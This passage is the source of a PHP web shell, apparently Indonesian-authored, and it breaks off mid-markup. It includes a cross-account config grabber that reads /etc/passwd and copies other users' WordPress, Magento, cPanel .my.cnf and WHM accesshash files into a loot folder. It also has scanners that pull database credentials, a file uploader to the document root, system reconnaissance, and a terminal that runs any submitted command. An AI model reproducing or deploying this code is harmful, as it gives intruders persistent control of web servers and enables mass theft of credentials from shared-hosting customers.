"/home/USER/public_html/admin/conf.php" => "5", "/home/USER/public_html/admin/config.php" => "4", "/home/USER/public_html/conf_global.php" => "invisio", "/home/USER/public_html/include/db.php" => "7", "/home/USER/public_html/connect.php" => "8", "/home/USER/public_html/mk_conf.php" => "mk-portale1", "/home/USER/public_html/include/config.php" => "12", "/home/USER/public_html/settings.php" => "Smf", "/home/USER/public_html/includes/functions.php" => "phpbb3", // PopojiCMS "/home/USER/public_html/po-content/config.php" => "Popoji", // Voodoo "/home/USER/public_html/vdo_config.php" => "Voodoo", // BosWeb "/home/USER/public_html/bw-configs/config.ini" => "BosWeb", // Lokomedia "/home/USER/public_html/config/koneksi.php" => "Lokomedia", "/home/USER/public_html/lokomedia/config/koneksi.php" => "Lokomedia", // Drupal "/home/USER/public_html/sites/default/settings.php" => "Drupal", // PrestaShop "/home/USER/public_html/config/settings.inc.php" => "PrestaShop", // Magento "/home/USER/public_html/app/etc/local.xml" => "Magento", // OpenCart "/home/USER/public_html/admin/config.php" => "OpenCart", "/home/USER/public_html/config.php" => "OpenCart-config", // Sitelok "/home/USER/public_html/slconfig.php" => "Sitelok", // EllisLab (ExpressionEngine) "/home/USER/public_html/application/config/database.php" => "Ellislab", // CPanel/WHM "/home/USER/.my.cnf" => "cpanel", "/home/USER/.accesshash" => "WHM-accesshash" ); // Home directories 1-7 $home_dirs = ['', '2', '3', '4', '5', '6', '7']; echo '<div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>User</th> <th>Config Found</th> <th>File</th> <th>Status</th> </tr> </thead> <tbody>'; while($passwd = @fgets($etc)) { if(preg_match('/^([^:]+):x:/', $passwd, $matches)) { $user_idx = $matches[1]; $users_found++; $user_configs_found = 0; foreach($home_dirs as $home_num) { $home_prefix = $home_num ? "home{$home_num}" : "home"; $user_config_dir = "/{$home_prefix}/{$user_idx}/public_html/"; if(is_readable("/{$home_prefix}/{$user_idx}/")) { foreach($grab_config as $config_pattern => $config_name) { $config_file = str_replace("USER", $user_idx, $config_pattern); $config_file = str_replace("/home/", "/{$home_prefix}/", $config_file); if(file_exists($config_file) && is_readable($config_file)) { $configs_found++; $user_configs_found++; // Save config to file $config_content = @file_get_contents($config_file); if($config_content !== false && trim($config_content) != '') { $output_file = $config_dir . "/{$user_idx}-{$config_name}.txt"; @file_put_contents($output_file, $config_content); echo '<tr> <td><span class="badge bg-info">'.$user_idx.'</span></td> <td><span class="badge bg-success">'.$config_name.'</span></td> <td><small>'.htmlspecialchars(basename($config_file)).'</small></td> <td><span class="badge bg-success">Saved</span></td> </tr>'; } } } } } // Jika tidak ada config yang ditemukan untuk user ini if($user_configs_found == 0) { echo '<tr> <td><span class="badge bg-info">'.$user_idx.'</span></td> <td colspan="3"><small class="text-muted">No configurations found</small></td> </tr>'; } } } @fclose($etc); echo '</tbody></table></div>'; echo '<div class="alert '.($configs_found > 0 ? 'alert-success' : 'alert-warning').' mt-3"> <i class="bi '.($configs_found > 0 ? 'bi-check-circle' : 'bi-exclamation-triangle').' me-2"></i> <strong>Scan Complete:</strong><br> Users scanned: '.$users_found.'<br> Configurations found: '.$configs_found.'<br> Files saved to: pbm_config/ </div>'; if($configs_found > 0) { echo '<div class="d-grid gap-2"> <a href="?dir='.urlencode($config_dir).'" class="btn btn-success"> <i class="bi bi-folder me-2"></i>Open pbm_config Directory ('.$configs_found.' files) </a> </div>'; } } } // Quick Scan Options echo '<hr class="bg-secondary"> <div class="row"> <div class="col-md-6"> <div class="card bg-dark border-primary"> <div class="card-header bg-primary"> <i class="bi bi-lightning me-2"></i>Quick CMS Scan </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Scan Directory:</label> <input type="text" name="scan_cms_dir" class="form-control bg-dark text-light" value="'.$dir.'" placeholder="/path/to/scan"> </div> <div class="mb-3"> <label class="form-label">CMS Types:</label> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="wordpress" checked> <label class="form-check-label">WordPress</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="joomla" checked> <label class="form-check-label">Joomla</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="drupal" checked> <label class="form-check-label">Drupal</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="vbulletin"> <label class="form-check-label">vBulletin</label> </div> <div class="form-check"> <input class="form-check-input" type="checkbox" name="cms_types[]" value="whmcs"> <label class="form-check-label">WHMCS</label> </div> </div> <button type="submit" name="quick_cms_scan" class="btn btn-primary w-100"> <i class="bi bi-search me-2"></i>Quick CMS Scan </button> </form> </div> </div> </div> <div class="col-md-6"> <div class="card bg-dark border-success"> <div class="card-header bg-success"> <i class="bi bi-database me-2"></i>Database Config Scanner </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Search for Database Credentials:</label> <select name="db_search_type" class="form-select bg-dark text-light"> <option value="all">All Database Files</option> <option value="wp">WordPress (wp-config.php)</option> <option value="joomla">Joomla (configuration.php)</option> <option value="config">Config Files</option> <option value="env">.env Files</option> </select> </div> <button type="submit" name="scan_db_configs" class="btn btn-success w-100"> <i class="bi bi-database-fill me-2"></i>Scan Database Configs </button> </form> </div> </div> </div> </div>'; // Handle quick CMS scan if(isset($_POST['quick_cms_scan'])) { $scan_dir = $_POST['scan_cms_dir']; $cms_types = $_POST['cms_types'] ?? []; echo '<div class="mt-4"> <h6><i class="bi bi-search me-2"></i>Quick CMS Scan Results:</h6>'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $cms_patterns = []; if(in_array('wordpress', $cms_types)) { $cms_patterns['WordPress'] = ['wp-config.php']; } if(in_array('joomla', $cms_types)) { $cms_patterns['Joomla'] = ['configuration.php']; } if(in_array('drupal', $cms_types)) { $cms_patterns['Drupal'] = ['sites/default/settings.php']; } if(in_array('vbulletin', $cms_types)) { $cms_patterns['vBulletin'] = ['includes/config.php']; } if(in_array('whmcs', $cms_types)) { $cms_patterns['WHMCS'] = ['configuration.php']; } $found_cms = []; // Recursive scan function function scanForCMS($dir, $patterns, &$found, $depth = 0, $max_depth = 3) { if($depth >= $max_depth) return; if(!is_dir($dir) || !is_readable($dir)) return; $items = @scandir($dir); if(!$items) return; foreach($items as $item) { if($item == '.' || $item == '..') continue; $path = $dir . '/' . $item; if(is_dir($path)) { scanForCMS($path, $patterns, $found, $depth + 1, $max_depth); } elseif(is_file($path)) { foreach($patterns as $cms_name => $cms_files) { foreach($cms_files as $cms_file) { if(basename($path) == $cms_file) { $found[] = [ 'cms' => $cms_name, 'file' => $path, 'dir' => dirname($path) ]; } } } } } } scanForCMS($scan_dir, $cms_patterns, $found_cms); if(!empty($found_cms)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Found '.count($found_cms).' CMS configuration files </div> <div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>CMS</th> <th>Config File</th> <th>Directory</th> <th>Actions</th> </tr> </thead> <tbody>'; foreach($found_cms as $cms) { echo '<tr> <td><span class="badge bg-success">'.$cms['cms'].'</span></td> <td><code>'.htmlspecialchars(basename($cms['file'])).'</code></td> <td><small>'.$cms['dir'].'</small></td> <td> <a href="?act=view&dir='.urlencode($cms['dir']).'&file='.urlencode($cms['file']).'" class="btn btn-sm btn-outline-info"> <i class="bi bi-eye"></i> View </a> <a href="?dir='.urlencode($cms['dir']).'" class="btn btn-sm btn-outline-warning"> <i class="bi bi-folder2-open"></i> Open </a> </td> </tr>'; } echo '</tbody></table></div>'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No CMS configuration files found in the specified directory </div>'; } } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot read directory: '.$scan_dir.' </div>'; } echo '</div>'; } // Handle database config scan if(isset($_POST['scan_db_configs'])) { $search_type = $_POST['db_search_type']; echo '<div class="mt-4"> <h6><i class="bi bi-database-fill me-2"></i>Database Config Scan Results:</h6>'; // Patterns for database configs $db_patterns = [ 'wp-config.php' => 'WordPress', 'configuration.php' => 'Joomla', 'settings.php' => 'Drupal', 'config.php' => 'General Config', '.env' => 'Environment', 'database.php' => 'Laravel/CodeIgniter', 'local.xml' => 'Magento', 'settings.inc.php' => 'PrestaShop' ]; // Filter based on search type $filtered_patterns = []; switch($search_type) { case 'wp': $filtered_patterns = ['wp-config.php' => 'WordPress']; break; case 'joomla': $filtered_patterns = ['configuration.php' => 'Joomla']; break; case 'config': $filtered_patterns = ['config.php' => 'General Config', 'configuration.php' => 'Joomla']; break; case 'env': $filtered_patterns = ['.env' => 'Environment']; break; default: $filtered_patterns = $db_patterns; } // Search in common locations $common_locations = [ $dir, '/home', '/var/www', '/var/www/html', '/usr/local/apache2/htdocs' ]; $found_db_configs = []; foreach($common_locations as $location) { if(is_dir($location) && is_readable($location)) { foreach($filtered_patterns as $file_pattern => $file_type) { $command = "find " . escapeshellarg($location) . " -name '" . $file_pattern . "' -type f 2>/dev/null | head -20"; $files = @shell_exec($command); if($files) { $file_list = explode("\n", trim($files)); foreach($file_list as $file) { if(!empty($file) && file_exists($file)) { $content = @file_get_contents($file); if($content && (preg_match('/DB_HOST|dbname|database|localhost|127.0.0.1/i', $content) || preg_match('/define.*DB_|mysql_connect|mysqli_connect/i', $content))) { $found_db_configs[] = [ 'file' => $file, 'type' => $file_type, 'dir' => dirname($file), 'has_db' => true ]; } } } } } } } if(!empty($found_db_configs)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Found '.count($found_db_configs).' database configuration files </div> <div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>Type</th> <th>File</th> <th>Directory</th> <th>DB Info</th> <th>Actions</th> </tr> </thead> <tbody>'; foreach($found_db_configs as $db_config) { // Try to extract database info $content = @file_get_contents($db_config['file']); $db_info = 'Not found'; if($content) { if(preg_match('/define.*[\'"]DB_NAME[\'"].*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/[\'"]database[\'"]\s*=>\s*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/dbname=([^;]+)/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } } echo '<tr> <td><span class="badge bg-info">'.$db_config['type'].'</span></td> <td><code>'.htmlspecialchars(basename($db_config['file'])).'</code></td> <td><small>'.$db_config['dir'].'</small></td> <td><small>'.$db_info.'</small></td> <td> <a href="?act=view&dir='.urlencode($db_config['dir']).'&file='.urlencode($db_config['file']).'" class="btn btn-sm btn-outline-info"> <i class="bi bi-eye"></i> View </a> <a href="?dir='.urlencode($db_config['dir']).'" class="btn btn-sm btn-outline-warning"> <i class="bi bi-folder2-open"></i> Open </a> </td> </tr>'; } echo '</tbody></table></div>'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No database configuration files found </div>'; } echo '</div>'; } echo '</div></div>'; } // Tab Archive Tools - DIPERBAIKI (Detect Archive di current dir) elseif($_GET['do'] == 'archive') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-file-zip me-2"></i>Archive Tools</h5> </div> <div class="card-body">'; // Detect archive files in current directory $archive_files = detectArchiveFiles($dir); if(!empty($archive_files)) { echo '<div class="alert alert-info"> <i class="bi bi-info-circle me-2"></i> <strong>Archive Files Found in Current Directory:</strong> </div> <div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th>File Name</th> <th>Type</th> <th>Size</th> <th>Actions</th> </tr> </thead> <tbody>'; foreach($archive_files as $archive) { $ext_badge = ''; switch($archive['ext']) { case 'zip': $ext_badge = 'bg-success'; break; case 'tar': $ext_badge = 'bg-primary'; break; case 'gz': $ext_badge = 'bg-warning'; break; case 'bz2': $ext_badge = 'bg-danger'; break; case 'rar': $ext_badge = 'bg-info'; break; default: $ext_badge = 'bg-secondary'; } echo '<tr> <td> <i class="bi bi-file-zip me-2"></i> '.$archive['name'].' </td> <td><span class="badge '.$ext_badge.'">.'.$archive['ext'].'</span></td> <td><span class="badge bg-secondary">'.$archive['size'].'</span></td> <td> <form method="post" class="d-inline"> <input type="hidden" name="archive_file" value="'.$archive['path'].'"> <button type="submit" name="extract_archive" class="btn btn-sm btn-outline-success"> <i class="bi bi-file-earmark-arrow-down"></i> Extract </button> </form> <a href="?act=download&dir='.urlencode($dir).'&file='.urlencode($archive['path']).'" class="btn btn-sm btn-outline-info"> <i class="bi bi-download"></i> Download </a> </td> </tr>'; } echo '</tbody></table></div><hr class="bg-secondary">'; } else { echo '<div class="alert alert-warning"> <i class="bi bi-exclamation-triangle me-2"></i> No archive files found in current directory </div>'; } echo '<div class="row g-4">'; // Archive Operations echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-success"> <i class="bi bi-file-arrow-down me-2"></i>Extract Archive </div> <div class="card-body"> <form method="post" enctype="multipart/form-data"> <div class="mb-3"> <label class="form-label">Upload Archive File:</label> <input type="file" name="archive_file" class="form-control bg-dark text-light"> <small class="text-muted">Supported: .zip, .tar, .tar.gz, .tar.bz2, .rar</small> </div> <div class="mb-3"> <label class="form-label">Or Use Existing File:</label> <input type="text" name="existing_archive" class="form-control bg-dark text-light" placeholder="/path/to/archive.zip"> </div> <div class="mb-3"> <label class="form-label">Extract To (optional):</label> <input type="text" name="extract_path" class="form-control bg-dark text-light" placeholder="Leave empty for current directory" value="'.$dir.'"> </div> <button type="submit" name="do_extract" class="btn btn-success w-100"> <i class="bi bi-file-earmark-arrow-down me-2"></i>Extract Archive </button> </form>'; if(isset($_POST['do_extract'])) { $extract_to = $_POST['extract_path'] ?: $dir; if(isset($_FILES['archive_file']) && $_FILES['archive_file']['error'] == 0) { $tmp_file = $_FILES['archive_file']['tmp_name']; $orig_name = $_FILES['archive_file']['name']; $target_file = sys_get_temp_dir() . '/' . $orig_name; if(move_uploaded_file($tmp_file, $target_file)) { if(unarchiveFile($target_file, $extract_to)) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive extracted successfully to <code>'.$extract_to.'</code> </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to extract archive. Make sure the file format is supported. </div>'; } @unlink($target_file); } } elseif(!empty($_POST['existing_archive'])) { $archive_file = $_POST['existing_archive']; if(file_exists($archive_file) && is_readable($archive_file)) { if(unarchiveFile($archive_file, $extract_to)) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive extracted successfully to <code>'.$extract_to.'</code> </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to extract archive. Make sure the file format is supported. </div>'; } } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Archive file not found or not readable: '.$archive_file.' </div>'; } } else { echo '<div class="alert alert-warning mt-3"> <i class="bi bi-exclamation-triangle me-2"></i> Please select an archive file or enter a path </div>'; } } // Handle extract from detected archives if(isset($_POST['extract_archive'])) { $archive_file = $_POST['archive_file']; $extract_to = $dir; if(unarchiveFile($archive_file, $extract_to)) { echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive extracted successfully to <code>'.$extract_to.'</code> </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to extract archive </div>'; } } echo '</div></div></div>'; // Create Archive echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-primary"> <i class="bi bi-file-arrow-up me-2"></i>Create Archive </div> <div class="card-body"> <form method="post"> <div class="mb-3"> <label class="form-label">Directory to Archive:</label> <input type="text" name="archive_dir" class="form-control bg-dark text-light" value="'.$dir.'" required> </div> <div class="mb-3"> <label class="form-label">Archive Name:</label> <input type="text" name="archive_name" class="form-control bg-dark text-light" value="backup_'.date('Y-m-d').'.zip" required> </div> <div class="mb-3"> <label class="form-label">Archive Type:</label> <select name="archive_type" class="form-select bg-dark text-light"> <option value="zip">ZIP (.zip)</option> <option value="tar">TAR (.tar)</option> <option value="tgz">GZipped TAR (.tar.gz)</option> </select> </div> <button type="submit" name="create_archive" class="btn btn-primary w-100"> <i class="bi bi-file-earmark-arrow-up me-2"></i>Create Archive </button> </form>'; if(isset($_POST['create_archive'])) { $archive_dir = $_POST['archive_dir']; $archive_name = $_POST['archive_name']; $archive_type = $_POST['archive_type']; $archive_path = $dir . '/' . $archive_name; if(is_dir($archive_dir) && is_readable($archive_dir)) { // Untuk ZIP if($archive_type == 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if($zip->open($archive_path, ZipArchive::CREATE) === TRUE) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($archive_dir), RecursiveIteratorIterator::LEAVES_ONLY ); foreach($files as $file) { if(!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($archive_dir) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); echo '<div class="alert alert-success mt-3"> <i class="bi bi-check-circle me-2"></i> Archive created successfully: <code>'.$archive_path.'</code><br> Size: '.formatSize($archive_path).' </div>'; } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Failed to create ZIP archive </div>'; } } else { echo '<div class="alert alert-warning mt-3"> <i class="bi bi-exclamation-triangle me-2"></i> ZIP creation requires ZipArchive class. Try using shell commands instead. </div>'; } } else { echo '<div class="alert alert-danger mt-3"> <i class="bi bi-x-circle me-2"></i> Directory not found or not readable: '.$archive_dir.' </div>'; } } // Check archive support echo '<div class="mt-3"> <h6><i class="bi bi-gear me-2"></i>Archive Support Status:</h6> <table class="table table-dark table-sm"> <tr> <td>ZipArchive Class:</td> <td>'.(class_exists('ZipArchive') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>PharData Class:</td> <td>'.(class_exists('PharData') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-danger">Not Available</span>').'</td> </tr> <tr> <td>Shell Exec for tar/zip:</td> <td>'.(function_exists('shell_exec') ? '<span class="badge bg-success">Available</span>' : '<span class="badge bg-warning">Limited</span>').'</td> </tr> </table> </div>'; echo '</div></div></div></div></div></div>'; } // Tab System Info - DIPERBAIKI (Network Info) elseif($_GET['do'] == 'system') { $php_version = PHP_VERSION; $safe_mode = (@ini_get("safe_mode") == 'on') ? checkStatus(false) : checkStatus(true); $magic_quotes = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) ? checkStatus(true) : checkStatus(false); $mysql = (function_exists('mysqli_connect')) ? checkStatus(true) : checkStatus(false); $exec = (function_exists('exec')) ? checkStatus(true) : checkStatus(false); $open_basedir = (ini_get("open_basedir")) ? checkStatus(true) : checkStatus(false); $symlink = (function_exists('symlink')) ? checkStatus(true) : checkStatus(false); echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-server me-2"></i>System Information</h5> </div> <div class="card-body"> <div class="row g-4">'; // Basic Info Column echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Basic Info</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>OS</strong></td><td>'.$os.'</td></tr> <tr><td><strong>Kernel</strong></td><td>'.$kernel.'</td></tr> <tr><td><strong>Server Software</strong></td><td>'.$_SERVER['SERVER_SOFTWARE'].'</td></tr> <tr><td><strong>PHP Version</strong></td><td><span class="badge bg-info">'.$php_version.'</span></td></tr> <tr><td><strong>Document Root</strong></td><td>'.$_SERVER['DOCUMENT_ROOT'].'</td></tr> </table> </div> </div> </div>'; // PHP Features Column echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">PHP Features</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>Safe Mode</strong></td><td>'.$safe_mode.'</td></tr> <tr><td><strong>Magic Quotes</strong></td><td>'.$magic_quotes.'</td></tr> <tr><td><strong>Open Basedir</strong></td><td>'.$open_basedir.'</td></tr> <tr><td><strong>Exec Function</strong></td><td>'.$exec.'</td></tr> <tr><td><strong>Symlink</strong></td><td>'.$symlink.'</td></tr> <tr><td><strong>MySQL Support</strong></td><td>'.$mysql.'</td></tr> </table> </div> </div> </div>'; // Tools Column echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Available Tools</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>cURL</strong></td><td>'.$curl.'</td></tr> <tr><td><strong>Wget</strong></td><td>'.$wget.'</td></tr> <tr><td><strong>Perl</strong></td><td>'.$perl.'</td></tr> <tr><td><strong>Python</strong></td><td>'.$python.'</td></tr> <tr><td><strong>Disk Space Free</strong></td><td>'.$freespace.'</td></tr> <tr><td><strong>Disk Space Total</strong></td><td>'.$total.'</td></tr> </table> </div> </div> </div>'; // Network Column - DIPERBAIKI echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Network Info</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>Server IP</strong></td><td>'.'Server IP - '.$server_ip.' {'.$_SERVER['REMOTE_ADDR'].'}</td></tr> <tr><td><strong>Your IP</strong></td><td>'.$ip_user.'</td></tr> <tr><td><strong>Hostname</strong></td><td>'.gethostname().'</td></tr> <tr><td><strong>User Agent</strong></td><td>'.$_SERVER['HTTP_USER_AGENT'].'</td></tr> <tr><td colspan="2"><strong>Disabled Functions:</strong></td></tr> <tr><td colspan="2"><textarea class="form-control bg-dark text-light" rows="3" readonly>'.$show_ds.'</textarea></td></tr> </table> </div> </div> </div>'; echo '</div></div></div>'; // OS Specific Information if ($os == 'Windows') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-windows me-2"></i>Windows Information</h5> </div> <div class="card-body"> <div class="row g-4">'; $account_settings = exe('net accounts'); $account_user = exe('net user'); echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">User Accounts</div> <div class="card-body"> <pre class="terminal-output" style="max-height: 300px;">'.$account_user.'</pre> </div> </div> </div>'; echo '<div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">System Accounts</div> <div class="card-body"> <pre class="terminal-output" style="max-height: 300px;">'.$account_settings.'</pre> </div> </div> </div>'; echo '</div></div></div>'; } if ($os == 'Linux') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-ubuntu me-2"></i>Linux Information</h5> </div> <div class="card-body">'; $hdd_space = exe('df -h'); $hosts = exe('cat /etc/hosts'); echo '<div class="row g-4"> <div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">Disk Usage</div> <div class="card-body"> <pre class="terminal-output">'.$hdd_space.'</pre> </div> </div> </div> <div class="col-md-6"> <div class="card h-100"> <div class="card-header bg-secondary">System Info</div> <div class="card-body"> <table class="table table-dark table-sm"> <tr><td><strong>Distribution</strong></td><td>'.exe('cat /etc/issue').'</td></tr> <tr><td><strong>Current User</strong></td><td>'.exe('whoami').'</td></tr> <tr><td><strong>Hosts File</strong></td>'; if (is_readable('/etc/passwd')) { echo '<td><a href="?act=view&file=/etc/passwd" class="btn btn-sm btn-outline-info">View /etc/passwd</a></td>'; } else { echo '<td><span class="badge bg-danger">Not Readable</span></td>'; } echo '</tr></table> </div> </div> </div> </div> </div> </div>'; } } // ========== TAB-TAB LAINNYA ========== // Tab Upload (dari kode asli) elseif($_GET['do'] == 'upload') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-cloud-upload me-2"></i>File Upload</h5> </div> <div class="card-body"> <form method="post" enctype="multipart/form-data"> <div class="mb-3"> <label class="form-label">Upload Location:</label> <div class="form-check mb-2"> <input class="form-check-input" type="radio" name="tipe_upload" value="biasa" checked> <label class="form-check-label"> Current Directory '.w($dir, "").' </label> </div> <div class="form-check mb-3"> <input class="form-check-input" type="radio" name="tipe_upload" value="home_root"> <label class="form-check-label"> Document Root '.w($_SERVER["DOCUMENT_ROOT"], "").' </label> </div> </div> <div class="mb-3"> <input type="file" name="ix_file" class="form-control bg-dark text-light"> </div> <button type="submit" name="upload" class="btn btn-primary"> <i class="bi bi-upload me-2"></i>Upload File </button> </form>'; if(isset($_POST['upload'])) { echo '<div class="mt-3">'; if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i>Uploaded to: <code>'.$dir.'/'.$_FILES['ix_file']['name'].'</code> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i>Failed to upload file </div>'; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i>Uploaded to: <code>'.$root.'</code><br> <a href="http://'.$web.'" target="_blank" class="btn btn-sm btn-outline-info mt-2"> <i class="bi bi-box-arrow-up-right me-1"></i>Open: http://'.$web.' </a> </div>'; } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i>Failed to upload file </div>'; } } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i>Document root is not writable </div>'; } } echo '</div>'; } echo '</div></div>'; } // Tab Command Terminal (dari kode asli) elseif($_GET['do'] == 'cmd') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-terminal me-2"></i>Terminal</h5> </div> <div class="card-body"> <form method="post" class="mb-4"> <div class="input-group"> <span class="input-group-text bg-dark text-light border-secondary"> <i class="bi bi-terminal"></i> </span> <input type="text" class="form-control bg-dark text-light border-secondary" name="cmd" placeholder="'.$user.'@'.$_SERVER['HTTP_HOST'].':~$" value="'.(isset($_POST['cmd'])?htmlspecialchars($_POST['cmd']):'').'"> <button type="submit" name="do_cmd" class="btn btn-primary"> <i class="bi bi-play-fill me-1"></i>Execute </button> </div> </form>'; if(isset($_POST['do_cmd'])) { echo '<div class="mb-3"> <label class="form-label">Command Output:</label> <pre class="terminal-output">'.exe($_POST['cmd']).'</pre> </div>'; } // Quick commands echo '<div class="mt-4"> <h6><i class="bi bi-lightning me-2"></i>Quick Commands:</h6> <div class="d-flex flex-wrap gap-2"> <a href="?do=cmd&dir='.$dir.'&cmd=whoami" class="btn btn-sm btn-outline-info">whoami</a> <a href="?do=cmd&dir='.$dir.'&cmd=pwd" class="btn btn-sm btn-outline-info">pwd</a> <a href="?do=cmd&dir='.$dir.'&cmd=ls -la" class="btn btn-sm btn-outline-info">ls -la</a> <a href="?do=cmd&dir='.$dir.'&cmd=uname -a" class="btn btn-sm btn-outline-info">uname -a</a> <a href="?do=cmd&dir='.$dir.'&cmd=php -v" class="btn btn-sm btn-outline-info">php -v</a> </div> </div> </div> </div>'; } // Tab Recursive Scan (dari kode asli) elseif($_GET['do'] == 'scan') { echo '<div class="card mb-4"> <div class="card-header bg-dark"> <h5 class="mb-0"><i class="bi bi-search me-2"></i>Recursive Directory Scanner</h5> </div> <div class="card-body">'; echo '<form method="post" class="mb-4"> <div class="row g-3"> <div class="col-md-6"> <label class="form-label">Directory to Scan:</label> <input type="text" name="scan_dir" class="form-control bg-dark text-light" value="'.($dir ?: getHomeDirectory()).'" required> </div> <div class="col-md-4"> <label class="form-label">File Extensions (comma separated):</label> <input type="text" name="scan_ext" class="form-control bg-dark text-light" placeholder="php,html,js,conf,config" value="'.($_POST['scan_ext'] ?? '').'"> </div> <div class="col-md-2"> <label class="form-label">Max Depth:</label> <input type="number" name="scan_depth" class="form-control bg-dark text-light" value="'.($_POST['scan_depth'] ?? 5).'" min="1" max="20"> </div> </div> <div class="mt-3"> <button type="submit" name="do_scan" class="btn btn-primary"> <i class="bi bi-search me-2"></i>Start Scanning </button> </div> </form>'; if(isset($_POST['do_scan'])) { $scan_dir = $_POST['scan_dir']; $extensions = array_map('trim', explode(',', $_POST['scan_ext'])); $extensions = array_filter($extensions); $max_depth = intval($_POST['scan_depth']); echo '<div class="alert alert-info"> <i class="bi bi-info-circle me-2"></i> Scanning directory: <code>'.$scan_dir.'</code><br> Extensions: '.($extensions ? implode(', ', $extensions) : 'All files').' | Max Depth: '.$max_depth.' </div>'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $start_time = microtime(true); $files = recursiveScan($scan_dir, $extensions, $max_depth); $end_time = microtime(true); $scan_time = round($end_time - $start_time, 3); echo '<div class="alert alert-success"> <i class="bi bi-check-circle me-2"></i> Found '.count($files).' files in '.$scan_time.' seconds </div>'; if(!empty($files)) { echo '<div class="table-responsive"> <table class="table table-dark table-sm"> <thead> <tr> <th width="5%">#</th> <th width="60%">File Path</th> <th width="15%">Size</th> <th width="20%">Actions</th> </tr> </thead> <tbody>'; $counter = 1; foreach ($files as $file) { if($counter > 100) { // Limit display to 100 files echo '<tr><td colspan="4" class="text-center text-warning"> ... and '.(count($files) - 100).' more files </td></tr>'; break; } $size = formatSize($file); $dir_path = dirname($file); echo '<tr> <td>'.$counter.'</td> <td> <i class="bi bi-file-earmark-text me-2 text-info"></i> '.$file.' </td> <td><span class="badge bg-secondary">'.$size.'</span></td> <td> <div class="btn-group btn-group-sm"> <a href="?act=view&dir='.urlencode($dir_path).'&file='.urlencode($file).'" class="btn btn-outline-info" title="View"> <i class="bi bi-eye"></i> </a> <a href="?dir='.urlencode($dir_path).'" class="btn btn-outline-warning" title="Open 